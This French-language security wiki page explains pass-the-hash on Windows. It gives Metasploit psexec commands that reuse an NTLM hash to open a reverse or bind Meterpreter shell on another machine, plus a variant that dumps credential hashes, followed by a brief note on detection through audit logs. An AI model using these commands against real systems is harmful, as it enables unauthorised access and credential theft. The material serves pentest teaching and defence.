Pass-the-hash

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Domaine Post-exploitation Windows
Principe Réutiliser le hash NTLM sans le casser
Module windows/smb/psexec
Voir aussi Mimikatz · UAC · Registre

Après un hashdump, casser le mot de passe demande beaucoup de temps CPU. La technique pass-the-hash contourne cette étape : on réutilise directement le hash NTLM pour s'authentifier sur une autre machine, sans jamais connaître le mot de passe en clair.

Procédure

use windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.19
set LPORT 443
set RHOST 192.168.0.31
set SMBPass aad35a85b48a04eeaad3b435b51404ee
exploit

Ensuite, voir Augmentation des droits utilisateur.

Variante avec bind_tcp et hashdump

use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set RHOST ...
set smbuser Administrator
exploit
# une fois dans le meterpreter
run post/windows/gather/smart_hashdump

Détection et protection

LM et NTLM : il n'est pas possible d'empêcher le vol de hash. La prévention passe par les journaux d'audit Windows.

La détection consiste à vérifier que l'utilisateur source est bien celui demandé lors de l'authentification distante. Le seul moyen fiable est de bien connaître les journaux en fonctionnement normal afin de repérer l'anormal.

Voir aussi

  • Mimikatz — extraction des identifiants en mémoire
  • UAC — durcissement côté client (forcer NTLMv2)
  • Registre — persistance en post-exploitation